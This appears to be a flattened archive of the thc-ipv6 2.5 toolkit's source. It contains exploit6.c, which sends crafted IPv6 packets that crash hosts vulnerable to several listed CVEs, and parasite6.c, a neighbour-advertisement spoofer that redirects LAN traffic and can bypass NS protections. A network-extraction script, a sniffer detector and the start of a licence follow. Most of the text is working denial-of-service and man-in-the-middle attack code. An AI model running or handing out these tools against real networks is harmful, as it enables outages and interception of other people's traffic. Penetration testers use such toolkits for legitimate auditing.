Email me at vh@thc.org; feedback is always appreciated!

thc-ipv6-2.5/exploit6.c0000644000000000000000000002753512251022435013444 0ustar rootroot/* * Tests various known IPv6 vulnerabilities against a target. * */ #include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" unsigned short int ports[] = { 22, 25, 53, 80, 443, 0 }; int rawmode = 0; void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s interface destination [test-case-number]\n\n", prg); printf("Performs exploits of various CVE known IPv6 vulnerabilities on the destination\n"); printf("Note that for exploitable overflows only 'AAA...' 
strings are used.\n"); printf("If a system is vulnerable, it will crash, so be careful!\n"); // printf("Use -r to use raw mode.\n\n"); exit(-1); } void ignoreit() { return; } int check_alive(pcap_t * p, char *interface, unsigned char *src, unsigned char *dst) { int ret = -2; time_t t; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); thc_ping6(interface, src, dst, 16, 1); t = time(NULL); while (ret < 0) { if (thc_pcap_check(p, (char *) ignoreit, NULL) > 0) ret = 1; if (time(NULL) > t + 1 && ret == -2) { thc_ping6(interface, src, dst, 16, 1); ret = -1; } if (time(NULL) > t + 4 && ret < 0) ret = 0; } return ret > 0 ? 1 : 0; } int main(int argc, char *argv[]) { int test = 0, count = 1, tmplen; unsigned char buf[1500], bla[1500], tests[256], string[64] = "ip6 and dst ", string2[64] = "ip6 and src "; unsigned char *dst6, *ldst6 = malloc(16), *src6, *lsrc6, *mcast6, *route6, *mal; unsigned char *srcmac = NULL, *dstmac = NULL, *routers[2], null_buffer[6]; thc_ipv6_hdr *hdr; int i = 0, j, srcmtu, fragsize, offset = 14; pcap_t *p; unsigned char *pkt = NULL, *pkt2 = NULL, *pkt3 = NULL; int pkt_len = 0, pkt_len2 = 0, pkt_len3 = 0, noping = 0, mtu = 1500; char *interface; thc_ipv6_hdr *ipv6; if (argc < 3 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); if (strcmp(argv[1], "-r") == 0) { thc_ipv6_rawmode(1); rawmode = 1; argv++; argc--; } if (strcmp(argv[1], "-p") == 0) { noping = 1; argv++; argc--; } if (do_hdr_size) offset = do_hdr_size; interface = argv[1]; dst6 = thc_resolve6(argv[2]); route6 = thc_resolve6("2a01::"); memcpy(ldst6, dst6, 16); memset(ldst6 + 2, 0, 6); ldst6[0] = 0xfe; ldst6[1] = 0x80; mcast6 = thc_resolve6("ff02::1"); if (argc >= 4) test = atoi(argv[3]); memset(buf, 0, sizeof(buf)); memset(null_buffer, 0, sizeof(null_buffer)); src6 = thc_get_own_ipv6(interface, dst6, PREFER_GLOBAL); if ((lsrc6 = thc_get_own_ipv6(interface, ldst6, PREFER_LINK)) == NULL) { fprintf(stderr, "Error: invalid interface %s\n", interface); exit(-1); } strcat(string, 
thc_ipv62notation(src6)); strcat(string2, thc_ipv62notation(dst6)); srcmac = thc_get_own_mac(interface); if (rawmode == 0) { if ((dstmac = thc_get_mac(interface, src6, dst6)) == NULL) { fprintf(stderr, "ERROR: Can not resolve mac address for %s\n", argv[2]); exit(-1); } } else dstmac = null_buffer; if ((srcmtu = thc_get_mtu(interface)) <= 0) { fprintf(stderr, "ERROR: can not get mtu from interface %s\n", interface); exit(-1); } if (do_hdr_size) srcmtu -= (do_hdr_size - 14); fragsize = ((srcmtu - 62) / 8) * 8; if ((p = thc_pcap_init(interface, string)) == NULL) { fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string); exit(-1); } setvbuf(stdout, NULL, _IONBF, 0); memset(tests, 0, sizeof(tests)); printf("Performing vulnerability checks on %s via %s:\n", argv[2], argv[1]); if (noping == 0 && check_alive(p, interface, src6, dst6) == 0) { fprintf(stderr, "Error: target %s is not alive via direct ping6!\n", argv[2]); exit(-1); } else printf("Test 0: normal ping6\t\t\t\tPASSED - we got a reply\n"); /********************** TEST CASES ************************/ if (test == 0 || test == count) { // 1432 printf("Test %2d: CVE-NONE overlarge ping, 6 checksum combinations\n", count); tmplen = 65864; if ((mal = malloc(tmplen)) == NULL) return -1; memset(mal, count % 256, tmplen); if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, mal, tmplen, 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; hdr = (thc_ipv6_hdr *) pkt; if (thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize) < 0) return -1; // because of the different possible checksum calculations we have to do them all hdr->pkt[offset + 40 + 3] = 0xe5; if (thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, 
fragsize) < 0) return -1; hdr->pkt[offset + 40 + 2] = 0x98; hdr->pkt[offset + 40 + 3] = 0xa4; if (thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize) < 0) return -1; hdr->pkt[offset + 40 + 3] = 0xa3; if (thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize) < 0) return -1; hdr->pkt[offset + 40 + 2] = 0x84; hdr->pkt[offset + 40 + 3] = 0x90; if (thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize) < 0) return -1; hdr->pkt[offset + 40 + 3] = 0x8f; if (thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize) < 0) return -1; free(mal); pkt = thc_destroy_packet(pkt); } count++; if (test == 0 || test == count) { // 1432 printf("Test %2d: CVE-NONE large ping, 3 checksum combinations\n", count); tmplen = 65527; if ((mal = malloc(tmplen)) == NULL) return -1; memset(mal, count % 256, tmplen); if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, mal, tmplen, 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; hdr = (thc_ipv6_hdr *) pkt; if (thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize) < 0) return -1; // because of the different possible checksum calculations we have to do them all hdr->pkt[offset + 40 + 2] = 0x31; hdr->pkt[offset + 40 + 3] = 0x8c; thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize); hdr->pkt[offset + 40 + 3] = 0x8a; thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize); free(mal); pkt = thc_destroy_packet(pkt); } count++; if (test == 0 || test == count) { 
printf("Test %2d: CVE-2003-0429 bad prefix length (little information, implementation unsure\n", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL) return -1; memset(buf, 0, sizeof(buf)); buf[6] = 4; // 4-7: retrans timer // option mtu buf[8] = 5; buf[9] = 1; buf[12] = mtu / 16777216; buf[13] = (mtu % 16777216) / 65536; buf[14] = (mtu % 65536) / 256; buf[15] = mtu % 256; // option prefix buf[16] = 3; buf[17] = 4; buf[18] = 128; // prefix length // BUG IS HERE buf[19] = 128 + 64; memset(&buf[20], 17, 4); memset(&buf[24], 4, 4); memcpy(&buf[32], route6, 16); i += 28; // mac address option buf[i++] = 1; buf[i++] = 1; memcpy(buf + i, srcmac, 6); i += 6; // default route routing option buf[i++] = 0x18; // routing entry option type buf[i++] = 0x03; // length 3 == 24 bytes buf[i++] = 0x00; // prefix length buf[i++] = 0x08; // priority, highest of course i += 2; // 52-53 unknown buf[i++] = 0x11; // lifetime, word buf[i++] = 0x11; // lifetime, word i += 16; // 56-71 address, all zeros for default thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, count, (unsigned char *) &buf, i, 0); if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); } count++; if (test == 0 || test == count) { printf("Test %2d: CVE-2004-0257 ping, send toobig on reply, then SYN pkt\n", count); memset(bla, count % 256, sizeof(bla)); memset(buf, 0, sizeof(buf)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 64, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, (unsigned char *) &bla, 68, 0) < 0) return -1; if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; ipv6 = (thc_ipv6_hdr *) pkt; thc_inverse_packet(ipv6->pkt + offset, ipv6->pkt_len - offset); sleep(1); thc_toobig6(interface, src6, srcmac, dstmac, 68, ipv6->pkt + 
offset, ipv6->pkt_len - offset); i = 0; while (ports[i] != 0) { if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 0, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_tcp(pkt, &pkt_len, 1100 + i * 100, ports[i], i * 1000, 0, TCP_SYN, 5760, 0, NULL, 0, NULL, 0) < 0) return -1; if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); pkt_len = 0; i++; } } count++; /* if (test == 0 || test == count) { printf("Test %2d: CVE-20\n", count); memset(bla, count % 256, sizeof(bla)); memset(buf, 0, sizeof(buf)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL) return -1; buf[0] = 0; thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, count, (unsigned char *) &buf, i, 0); if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); } count++; if (test == 0 || test == count) { printf("Test %2d: CVE-20\n", count); memset(bla, count % 256, sizeof(bla)); memset(buf, 0, sizeof(buf)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL) return -1; buf[0] = 0; thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, count, (unsigned char *) &buf, i, 0); if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); } count++; */ /* if (test == 0 || test == count) { printf("Test %2d: CVE-20\n", count); memset(bla, count%256, sizeof(bla)); memset(buf, 0, sizeof(buf)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL) return -1; buf[0] = 0; thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, count, (unsigned char *) &buf, i, 0); if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); } count++; */ // more? 
/******************* END OF TESTCASES ***************************/ if (noping == 1 || check_alive(p, interface, src6, dst6)) printf("Test %2d: normal ping6 (still alive?)\t\tPASSED - we got a reply\n", count); else printf("Test %2d: normal ping6 (still alive?)\t\tFAILED - target is unavailable now!\n", count); thc_pcap_close(p); return 0; } thc-ipv6-2.5/parasite6.c0000644000000000000000000002372112251022440013555 0ustar rootroot#include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" unsigned char *pkt = NULL, *pkt2 = NULL; int pkt_len = 0, pkt2_len = 0; thc_ipv6_hdr *ipv6, *ipv62; int mychecksum, do_loop = 0, pp[65536], pp_cnt = 0, do_hop = 0, do_frag = 0, do_dst = 0, do_reverse = 0, cnt, ptype = NXT_ICMP6; char *interface; char *ptr1, *ptr2, *ptr3, *ptr4; thc_ipv6_hdr *hdr; void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s [-lRFHD] interface [fake-mac]\n\n", prg); printf("This is an \"ARP spoofer\" for IPv6, redirecting all local traffic to your own\n"); printf("system (or nirvana if fake-mac does not exist) by answering falsely to\n"); printf("Neighbor Solitication requests\n"); printf("Option -l loops and resends the packets per target every 5 seconds.\n"); printf("Option -R will also try to inject the destination of the solicitation\n"); printf("NS security bypass: -F fragment, -H hop-by-hop and -D large destination header\n"); exit(-1); } void kill_children(int signo) { int i; for (i = 0; i <= pp_cnt; i++) if (pp[i] > 0 && pp[i] < 65536) kill(pp[i], SIGKILL); exit(0); } void intercept(u_char *foo, const struct pcap_pkthdr *header, const unsigned char *data) { unsigned char *ipv6hdr = (unsigned char *) (data + 14); if (debug) { printf("DEBUG: packet received\n"); thc_dump_data((unsigned char *) data, header->caplen, "Received Packet"); } if (ipv6hdr[6] != NXT_ICMP6 || ipv6hdr[40] != ICMP6_NEIGHBORSOL || header->caplen < 78) return; if (*(data + 22) + 
*(data + 23) + *(data + 24) + *(data + 25) + *(data + 34) + *(data + 35) + *(data + 36) + *(data + 37) == 0) return; if (debug) printf("DEBUG: packet is a valid icmp6 neighbor solitication\n"); memcpy(ipv6->pkt, data + 6, 6); // copy srcmac to dstmac memcpy(ipv6->pkt + 38, data + 22, 16); // copy srcip6 to dstip6 memcpy(ipv6->pkt + 22, data + 62, 16); // copy target to srcip6 memcpy(ipv6->pkt + 62 + (do_dst * 1400) + (do_hop + do_frag) * 8, data + 62, 16); // copy target to target ipv6->pkt[56 + (do_dst * 1400) + (do_hop + do_frag) * 8] = 0; ipv6->pkt[57 + (do_dst * 1400) + (do_hop + do_frag) * 8] = 0; mychecksum = checksum_pseudo_header(ipv6->pkt + 22, ipv6->pkt + 38, NXT_ICMP6, ipv6->pkt + 54 + (do_dst * 1400) + (do_hop + do_frag) * 8, 32); ipv6->pkt[56 + (do_dst * 1400) + (do_hop + do_frag) * 8] = mychecksum / 256; ipv6->pkt[57 + (do_dst * 1400) + (do_hop + do_frag) * 8] = mychecksum % 256; if (do_dst) thc_send_as_fragment6(interface, ipv6->pkt + 22, ipv6->pkt + 38, ptype, ipv6->pkt + 40 + 14, ipv6->pkt_len - 40 - 14, 1240); else thc_send_pkt(interface, pkt, &pkt_len); ptr2 = thc_ipv62notation(ipv6->pkt + 38); ptr4 = thc_ipv62notation(ipv6->pkt + 22); printf("Spoofed packet to %s as %s\n", ptr2, ptr4); free(ptr2); free(ptr4); ipv6->pkt[pkt_len - 28] = 0xa0; // reset SOL flag, ROUTER+OVERRIDE only ipv6->pkt[56 + (do_dst * 1400) + (do_hop + do_frag) * 8] = 0; ipv6->pkt[57 + (do_dst * 1400) + (do_hop + do_frag) * 8] = 0; mychecksum = checksum_pseudo_header(ipv6->pkt + 22, ipv6->pkt + 38, NXT_ICMP6, ipv6->pkt + 54 + (do_dst * 1400) + (do_hop + do_frag) * 8, 32); ipv6->pkt[56 + (do_dst * 1400) + (do_hop + do_frag) * 8] = mychecksum / 256; ipv6->pkt[57 + (do_dst * 1400) + (do_hop + do_frag) * 8] = mychecksum % 256; if (do_dst) thc_send_as_fragment6(interface, ipv6->pkt + 22, ipv6->pkt + 38, ptype, ipv6->pkt + 40 + 14, ipv6->pkt_len - 40 - 14, 1240); else thc_send_pkt(interface, pkt, &pkt_len); if (do_reverse) { memcpy(ipv62->pkt, data + 74, 4); // create the multicast 
mac for the dst so we dont need to do a NS :-) memcpy(ipv62->pkt + 38, data + 62, 16); // copy target do dst6 memcpy(ipv62->pkt + 22, data + 22, 16); // copy source to source memcpy(ipv62->pkt + 62 + (do_dst * 1400) + (do_hop + do_frag) * 8, data + 22, 16); // copy source to target ipv62->pkt[56 + (do_dst * 1400) + (do_hop + do_frag) * 8] = 0; ipv62->pkt[57 + (do_dst * 1400) + (do_hop + do_frag) * 8] = 0; mychecksum = checksum_pseudo_header(ipv62->pkt + 22, ipv62->pkt + 38, NXT_ICMP6, ipv62->pkt + 54 + (do_dst * 1400) + (do_hop + do_frag) * 8, 32); ipv62->pkt[56 + (do_dst * 1400) + (do_hop + do_frag) * 8] = mychecksum / 256; ipv62->pkt[57 + (do_dst * 1400) + (do_hop + do_frag) * 8] = mychecksum % 256; if (do_dst) thc_send_as_fragment6(interface, ipv62->pkt + 22, ipv62->pkt + 38, ptype, ipv62->pkt + 40 + 14, ipv62->pkt_len - 40 - 14, 1240); else thc_send_pkt(interface, pkt2, &pkt2_len); ptr2 = thc_ipv62notation(ipv62->pkt + 38); ptr4 = thc_ipv62notation(ipv62->pkt + 22); printf("Spoofed packet to %s as %s\n", ptr2, ptr4); free(ptr2); free(ptr4); } if ((pp[pp_cnt] = fork()) == 0) { usleep(200); debug = 0; if (do_dst) { thc_send_as_fragment6(interface, ipv6->pkt + 22, ipv6->pkt + 38, ptype, ipv6->pkt + 40 + 14, ipv6->pkt_len - 40 - 14, 1240); thc_send_as_fragment6(interface, ipv62->pkt + 22, ipv62->pkt + 38, ptype, ipv62->pkt + 40 + 14, ipv62->pkt_len - 40 - 14, 1240); } else { thc_send_pkt(interface, pkt, &pkt_len); if (do_reverse) thc_send_pkt(interface, pkt2, &pkt2_len); } sleep(1); if (do_loop == 1) { signal(SIGTERM, exit); signal(SIGSEGV, exit); signal(SIGHUP, exit); signal(SIGINT, exit); while (1) { sleep(5); if (do_dst) { thc_send_as_fragment6(interface, ipv6->pkt + 22, ipv6->pkt + 38, ptype, ipv6->pkt + 40 + 14, ipv6->pkt_len - 40 - 14, 1240); thc_send_as_fragment6(interface, ipv62->pkt + 22, ipv62->pkt + 38, ptype, ipv62->pkt + 40 + 14, ipv62->pkt_len - 40 - 14, 1240); } else { thc_send_pkt(interface, pkt, &pkt_len); if (do_reverse) thc_send_pkt(interface, 
pkt2, &pkt2_len); } } } exit(0); } else if (do_loop == 1 && pp[pp_cnt] != -1) { if (pp_cnt < 65534) pp_cnt++; else do_loop = 2; } ipv6->pkt[56] = 0; ipv6->pkt[57] = 0; ipv6->pkt[pkt_len - 28] = 0x60; // set SOL flag again (void) wait3(NULL, WNOHANG, NULL); return; } int main(int argc, char *argv[]) { char dummy[24], mac[16] = "", buf2[6], buf3[1398]; unsigned char *ownmac = mac; int i, j; if (argc < 2 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL) printf("WARNING: %s is not working with injection!\n", argv[0]); if (debug) printf("Preparing spoofed packet for speed-up\n"); while ((i = getopt(argc, argv, "FHDRl")) >= 0) { switch (i) { case 'F': do_frag++; break; case 'H': do_hop = 1; break; case 'D': do_dst = 1; break; case 'R': do_reverse = 1; break; case 'l': do_loop = 1; break; default: fprintf(stderr, "Error: invalid option %c\n", i); exit(-1); } } if (argc - optind < 1) help(argv[0]); interface = argv[optind]; if (argc - optind == 2 && argv[optind + 1] != NULL) sscanf(argv[optind + 1], "%x:%x:%x:%x:%x:%x", (unsigned int *) &mac[0], (unsigned int *) &mac[1], (unsigned int *) &mac[2], (unsigned int *) &mac[3], (unsigned int *) &mac[4], (unsigned int *) &mac[5]); else ownmac = thc_get_own_mac(interface); if (thc_get_own_ipv6(interface, NULL, PREFER_LINK) == NULL) { fprintf(stderr, "Error: invalid interface %s\n", interface); exit(-1); } memset(dummy, 'X', sizeof(dummy)); dummy[16] = 2; dummy[17] = 1; memcpy(&dummy[18], ownmac, 6); memset(buf2, 0, sizeof(buf2)); setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stderr, NULL, _IONBF, 0); for (i = 0; i <= 0 + do_reverse; i++) { // printf("i: %d\n", i); if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, dummy, dummy, 255, 0, 0, 0, 0)) == NULL) return -1; if (do_hop) { ptype = NXT_HBH; if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf2, sizeof(buf2)) < 0) return -1; } if (do_frag) { if (ptype == NXT_ICMP6) ptype = NXT_FRAG; for (j = 0; j < 
do_frag; j++) if (thc_add_hdr_oneshotfragment(pkt, &pkt_len, cnt++) < 0) return -1; } if (do_dst) { if (ptype == NXT_ICMP6) ptype = NXT_DST; if (thc_add_hdr_dst(pkt, &pkt_len, buf3, sizeof(buf3)) < 0) return -1; } if (thc_add_icmp6(pkt, &pkt_len, ICMP6_NEIGHBORADV, 0, ICMP6_NEIGHBORADV_SOLICIT | ICMP6_NEIGHBORADV_OVERRIDE | ICMP6_NEIGHBORADV_ROUTER, dummy, 24, 0) < 0) return -1; if (thc_generate_pkt(interface, ownmac, dummy, pkt, &pkt_len) < 0) return -1; ipv6 = (thc_ipv6_hdr *) pkt; memset(ipv6->pkt + 56 + (do_dst * 1400) + (do_hop + do_frag) * 8, 0, 2); // reset checksum to zero if (debug) { thc_dump_data(ipv6->pkt, ipv6->pkt_len, "Prepared spoofing packet"); printf("\n"); } // printf("i: %d, do_reverse: %d\n", i, do_reverse); if (i == 0 && do_reverse) { // printf("ipv62->ipv6 %p\n", ipv6); ipv62 = ipv6; ipv62->pkt[0] = 0x33; // multicast mac hack for destination ipv62->pkt[1] = 0x33; // multicast mac hack for destination ipv6 = NULL; pkt2 = pkt; pkt = NULL; pkt2_len = pkt_len; pkt_len = 0; ipv62->pkt[pkt2_len - 28] = 0xa0; // reset SOL flag, ROUTER+OVERRIDE only } } signal(SIGTERM, kill_children); signal(SIGSEGV, kill_children); signal(SIGHUP, kill_children); signal(SIGINT, kill_children); memset((char*)pp, 0, sizeof(pp)); printf("Remember to enable routing (ip_forwarding), you will denial service otherwise!\n"); printf(" => echo 1 > /proc/sys/net/ipv6/conf/all/forwarding\n"); printf("Started ICMP6 Neighbor Solitication Interceptor (Press Control-C to end) ...\n"); return thc_pcap_function(interface, "icmp6", (char *) intercept, 1, NULL); } thc-ipv6-2.5/extract_networks6.sh0000755000000000000000000000151012234222354015545 0ustar rootroot#!/bin/bash test -z "$1" -o "$1" = "-h" && { echo $0 FILE echo prints the networks found in FILE #, specify - for stdin exit 1 } test -e "$1" -o "$1" = "-" || { echo Error: File $1 not found exit 1 } { test "$1" = "-" && { echo no } || { cat $1 | egrep :: | egrep -v 
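'^[0-9a-fA-F]{1,4}:[0-9a-fA-F]{1,4}:[0-9a-fA-F]{1,4}:[0-9a-fA-F]{1,4}:[0-9a-fA-F]{1,4}|[0-9a-fA-F]{1,4}:[0-9a-fA-F]{1,4}:[0-9a-fA-F]{1,4}:[0-9a-fA-F]{1,4}:[0-9a-fA-F]{1,4}$' | sed 's/::.*/::/' cat $1 | egrep -v :: | awk -F: '{print $1":"$2":"$3":"$4"::"}' cat $1 | egrep :: | egrep '^[0-9a-fA-F]{1,4}:[0-9a-fA-F]{1,4}:[0-9a-fA-F]{1,4}:[0-9a-fA-F]{1,4}:[0-9a-fA-F]{1,4}|[0-9a-fA-F]{1,4}:[0-9a-fA-F]{1,4}:[0-9a-fA-F]{1,4}:[0-9a-fA-F]{1,4}:[0-9a-fA-F]{1,4}$' | sed 's/::/:0:0:/' | awk -F: '{print $1":"$2":"$3":"$4"::"}' } } | sort -n exit 0 thc-ipv6-2.5/detect_sniffer6.c0000644000000000000000000001105312251022434014729 0ustar rootroot #include #include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h"

struct timespec ts, ts2;
int found = 0, oneonly = 0;
/* Raw 16-byte IPv6 source addresses of the hosts already reported. */
char doubles[256][16];

/* Prints the usage text for the tool and terminates with exit code -1. */
void help(char *prg) {
  printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE);
  printf("Syntax: %s interface [target6]\n\n", prg);
  printf("Tests if systems on the local LAN are sniffing.\n");
  printf("Works against Windows, Linux, OS/X and *BSD\n");
  printf("If no target is given, the link-local-all-nodes address is used, which\nhowever not always works.\n");
  exit(-1);
}

/*
 * Prints the final summary and exits with code 0.
 * Installed as the SIGALRM handler by main() and also called directly from
 * check_packets() when a single (non-multicast) target was given.
 * NOTE(review): printf() and exit() are not async-signal-safe; tolerated here
 * because the process terminates immediately afterwards.
 */
void alarming() {
  if (found == 0)
    printf("No packets received, no vulnerable system seems to be sniffing.\n");
  else
    printf("%d sniffing host%s detected.\n", found, found == 1 ? "" : "s");
  exit(0);
}

/*
 * Capture callback: reports each host that answered the probe once.
 *
 * pingdata  the 8-byte marker that main() placed in the probe payload
 * header    pcap header of the captured frame (caplen = captured bytes)
 * data      captured frame, starting at the link-layer header
 *
 * Changes against the previous version:
 *  - the capture length is validated before any header byte is read;
 *  - hosts are de-duplicated on the raw 16-byte source address instead of the
 *    first 16 characters of its text form, which made distinct addresses that
 *    share a prefix look like duplicates;
 *  - writes to doubles[] are bounded by the table size;
 *  - the string returned by thc_ipv62notation() is requested once and freed.
 */
void check_packets(u_char *pingdata, const struct pcap_pkthdr *header, const unsigned char *data) {
  const int max_hosts = (int) (sizeof(doubles) / sizeof(doubles[0]));
  int len = header->caplen, known, i;
  unsigned char *ptr = (unsigned char *) data;
  char *notation;

  /* skip the link-layer header so that ptr points at the IPv6 header */
  if (do_hdr_size) {
    len -= do_hdr_size;
    ptr += do_hdr_size;
  } else {
    len -= 14;
    ptr += 14;
  }

  if (len < 136)                // ignoring too short packet
    return;
  if (do_hdr_size && (ptr[0] & 240) != 0x60)    // not an IPv6 packet
    return;

  /* The marker is searched at eight consecutive offsets from the frame start.
   * NOTE(review): the offset 106 is relative to data, not ptr, so it presumably
   * assumes a 14-byte link header - confirm for the do_hdr_size case. */
  for (i = 0; i < 8; i++)
    if (memcmp(pingdata, data + 106 + i, 8) == 0)
      break;
  if (i == 8)
    return;

  /* ptr + 8 is the IPv6 source address of the answering host */
  known = found < max_hosts ? found : max_hosts;
  for (i = 0; i < known; i++)
    if (memcmp(doubles[i], ptr + 8, 16) == 0)
      return;                   // already reported

  notation = thc_ipv62notation(ptr + 8);
  printf(" Sniffing host detected: %s\n", notation != NULL ? notation : "(unprintable address)");
  free(notation);

  /* Once the table is full, further hosts are still reported and counted but
   * can no longer be de-duplicated. */
  if (found < max_hosts)
    memcpy(doubles[found], ptr + 8, 16);
  found++;

  if (oneonly)
    alarming();
}

int main(int argc, char *argv[]) { unsigned char *pkt1 = NULL, *pkt2 = NULL, buf[2096] = "thcping6", buf2[6]; unsigned char *src6 = NULL, *dst6 = NULL; unsigned char dmac[7] = { 0x33, 0x33, 0xff, 0x01, 0x00, 0xfe, 0x00 }; char string[255] = "icmp6 and dst ", *interface; int pkt1_len = 0, pkt2_len = 0, flags = 0, j; pcap_t *p; if (argc < 2 || argc > 3 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stderr, NULL, _IONBF, 0); if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL) printf("WARNING: %s is not working with injection!\n", argv[0]); memset(buf, 0, sizeof(buf)); for (j = 0; j < (128 / 8); j++) memcpy(buf + j * 8, "thcsniff", 8); memset(buf2 + 2, 0, 4); buf2[0] = NXT_INVALID; buf2[1] = 1; interface = argv[1]; if (argc == 3) { if ((dst6 = thc_resolve6(argv[2])) == NULL) { fprintf(stderr, "Error: not a valid target: %s\n", argv[2]); exit(-1); } if (dst6[0] != 0xff) oneonly = 1; } else dst6 = thc_resolve6("ff02::1"); if ((src6 = thc_get_own_ipv6(interface, dst6, PREFER_LINK)) == NULL) { fprintf(stderr, "Error: no IPv6 address found for interface %s!\n", interface); exit(-1); } if ((pkt1 = thc_create_ipv6_extended(interface, 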
PREFER_LINK, &pkt1_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_icmp6(pkt1, &pkt1_len, ICMP6_ECHOREQUEST, 0, flags, (unsigned char *) &buf, 128, 0) < 0) return -1; if (thc_generate_pkt(interface, NULL, dmac, pkt1, &pkt1_len) < 0) { fprintf(stderr, "Error: Can not generate packet, exiting ...\n"); exit(-1); } if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt2_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_hdr_dst(pkt2, &pkt2_len, (unsigned char *) &buf2, sizeof(buf2)) < 0) return -1; if (thc_add_icmp6(pkt2, &pkt2_len, ICMP6_ECHOREQUEST, 0, flags, (unsigned char *) &buf, 128, 0) < 0) return -1; if (thc_generate_pkt(interface, NULL, dmac, pkt2, &pkt2_len) < 0) { fprintf(stderr, "Error: Can not generate packet, exiting ...\n"); exit(-1); } strcat(string, thc_ipv62notation(src6)); if ((p = thc_pcap_init(interface, string)) == NULL) { fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string); exit(-1); } signal(SIGALRM, alarming); alarm(3); printf("Sending sniffer detection packets to %s\n", thc_ipv62notation(dst6)); thc_send_pkt(interface, pkt1, &pkt1_len); thc_send_pkt(interface, pkt2, &pkt2_len); thc_send_pkt(interface, pkt1, &pkt1_len); thc_send_pkt(interface, pkt2, &pkt2_len); while (1) { thc_pcap_check(p, (char *) check_packets, buf); } return 0; // not reached } thc-ipv6-2.5/LICENSE.OPENSSL0000644000000000000000000002053412234222353013647 0ustar rootroot/* * (c) 2002, 2003, 2004 by Jason McLaughlin and Riadh Elloumi * * This program is free software; you can redistribute it and/or * modify it under the terms of the GNU General Public License as * published by the Free Software Foundation; either version 